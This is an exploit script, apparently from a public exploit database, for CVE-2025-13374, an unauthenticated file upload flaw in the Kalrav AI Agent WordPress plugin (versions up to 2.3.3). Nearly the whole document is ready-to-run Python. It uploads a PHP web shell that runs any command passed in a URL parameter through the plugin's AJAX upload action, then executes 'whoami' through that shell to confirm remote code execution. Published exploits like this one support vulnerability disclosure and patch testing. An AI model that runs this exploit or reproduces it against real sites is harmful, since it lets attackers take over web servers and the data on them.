# Exploit Title: Kalrav AI Agent <= 2.3.3 - Unauthenticated Arbitrary File Upload
# Date: 11/15/2025
# Exploit Author: Ryan Kozak
# Vendor Homepage: https://wordpress.org/plugins/kalrav-ai-agent
# Version: <= 2.3.3
# CVE : CVE-2025-13374

import requests
import re
import sys
import argparse
from urllib.parse import urljoin

def main():
    parser = argparse.ArgumentParser(description='Kalrav AI Agent Plugin File Upload Exploit')
    parser.add_argument('url', help='Target WordPress URL (e.g., http://example.com)')
    
    args = parser.parse_args()
    
    print(f"[+] Target: {args.url}")
    
    # Upload malicious file
    upload_url = urljoin(args.url, '/wp-admin/admin-ajax.php')
    
    files = {
        'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php')
    }
    
    data = {
        'action': 'kalrav_upload_file'
    }
    
    response = requests.post(upload_url, files=files, data=data)

    # Extract file URL from response
    file_url_match = re.search(r'"url":"([^"]+)"', response.text)
    if not file_url_match:
        print("[-] Failed to upload file")
        sys.exit(1)
    
    file_url = file_url_match.group(1)
    # Fix escaped slashes in URL
    file_url = file_url.replace('\\/', '/')
    print(f"[+] File uploaded successfully!")
    print(f"[+] Shell URL: {file_url}")
    
    # Test the shell
    test_url = f"{file_url}?cmd=whoami"
    response = requests.get(test_url)
    print(f"[+] Command output:")
    print(response.text.strip())

if __name__ == "__main__":
    main()